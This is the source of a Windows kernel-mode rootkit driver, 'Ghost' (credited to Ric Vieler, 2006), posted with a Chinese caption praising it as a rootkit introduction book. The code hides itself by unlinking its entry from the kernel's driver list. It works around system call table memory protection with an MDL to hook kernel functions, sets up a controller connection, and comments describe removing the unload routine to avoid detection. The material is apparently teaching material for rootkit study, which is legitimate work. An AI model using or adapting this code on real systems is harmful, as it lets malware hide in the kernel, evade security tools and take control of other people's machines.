ghost.c

很好的rootkit介绍书籍

// Ghost
// Copyright Ric Vieler, 2006

#include "ntddk.h"
#include "Ghost.h"
#include "fileManager.h"
#include "configManager.h"
#include "hookManager.h"

// Global version data
ULONG majorVersion;
ULONG minorVersion;

// Global base address
PVOID kernel32Base = NULL;

// Used to circumvent memory protected System Call Table
PVOID* NewSystemCallTable = NULL;
PMDL pMyMDL = NULL;

// Pointer(s) to original function(s) - before hooking
ZWMAPVIEWOFSECTION OldZwMapViewOfSection;
ZWPROTECTVIRTUALMEMORY OldZwProtectVirtualMemory;

// Comment out in free build to avoid detection
VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
	DbgPrint("comint32: OnUnload called.");

	// Unhook any hooked functions and return the Memory Descriptor List
	if( NewSystemCallTable )
	{
		UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection );
		MmUnmapLockedPages( NewSystemCallTable, pMyMDL );
		IoFreeMdl( pMyMDL );
	}

}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
	DRIVER_DATA* driverData;

	// Get the operating system version
	PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

	// Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
	// Major = 5: Windows Server 2003, Windows XP or Windows 2000
	// Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
	// Minor = 1: Windows XP
	// Minor = 2: Windows Server 2003

	if ( majorVersion == 5 && minorVersion == 2 )
	{
		DbgPrint("comint32: Running on Windows 2003");
	}
	else if ( majorVersion == 5 && minorVersion == 1 )
	{
		DbgPrint("comint32: Running on Windows XP");
	}
	else if ( majorVersion == 5 && minorVersion == 0 )
	{
		DbgPrint("comint32: Running on Windows 2000");
	}
	else if ( majorVersion == 4 && minorVersion == 0 )
	{
		DbgPrint("comint32: Running on Windows NT 4.0");
	}
	else
	{
		DbgPrint("comint32: Running on unknown system");
	}

	// Hide this driver
	driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));
	if( driverData != NULL )
	{
		// unlink this driver entry from the driver list
		*((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;
		driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;
	}

	// Comment out in free build to avoid detection
	pDriverObject->DriverUnload = OnUnload; 

	// Configure the controller connection
	if( !NT_SUCCESS( Configure() ) )
	{
		DbgPrint("comint32: Configure failed!\n");		
		return STATUS_UNSUCCESSFUL;
	}

	// Add kernel hooks
	if( !NT_SUCCESS( HookKernel() ) )
	{
		DbgPrint("comint32: HookKernel failed!\n");		
		return STATUS_UNSUCCESSFUL;
	}

	return STATUS_SUCCESS;
}